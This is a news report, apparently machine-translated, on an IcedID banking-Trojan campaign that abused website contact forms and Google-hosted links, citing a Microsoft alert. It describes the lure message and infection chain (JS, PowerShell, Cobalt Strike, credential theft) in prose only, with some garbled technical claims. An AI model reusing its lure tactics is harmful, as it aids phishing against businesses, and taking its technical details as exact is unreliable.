Malware-spreading criminals take advantage of the company’s official contact channel

According to reports, the contact form on the website and Google URLs are being used in an attack campaign to spread the banking Trojan horse IcedID. Microsoft has looked into the attacks and issued an alert.

The’contact type’ in this case refers to the’contact us’ form found on websites. This is a feature that users use to contact site administrators, and it is said that attackers use it to send threatening messages. “Your company has stolen a copyrighted photo or picture, and we will pursue legal action against you.”

I also added a connection called “Proof” at the same time. If you actually press, you will be led to a Google page where you can download IcedID or BokBot. Iced ID (Bokbot) is a malware and loader that steals personal information.

The strange thing is that the attackers’ fake names all begin with the letter’mel,’ such as Melanie or Meleena. Fake email addresses also begin with the letter m. MS researchers discovered the addresses [email protected] and [email protected]. The explanation for this has yet to be discovered.

A.JS file occurs when the zip file associated with the malicious connection is uncompressed. It generates a shell object and is run via WScript. The IcedID payload is downloaded as a.DAT file by this shell object, which runs PowerShell. A Cobalt Strike beacon in the form of a DLL file is also included in this file, allowing attackers to remotely monitor the victim’s computer.

While executing various commands to steal information, attackers collect IP addresses and device information. Simultaneously, it disables SQlite (SQLite) in order to steal bank and financial institution credentials from browser databases.

The modules are downloaded after establishing a link with the C&C server in the case of the malware iced ID in question. Basic modules for securing and stealing banking credentials, as well as modules for stealing different types of data, are included. It also makes use of the task scheduler to ensure attack persistence.

In anticipation of the sites’ closure, attackers have set up another attack route. A malicious connection can be found on the website. This is a Google User Content page that also hosted malicious zip files.

If a malicious e-mail is sent via the site administrator’s’contact us’ form, it’s highly unlikely that the e-mail security devices will detect it. It’s often difficult to be doubtful. This is due to the fact that it is an official e-mail solution for communication, and there haven’t been several incidents of assault using it. Furthermore, since ordinary consumers often approach the firm through the appropriate method, the vigilance barrier is not strong.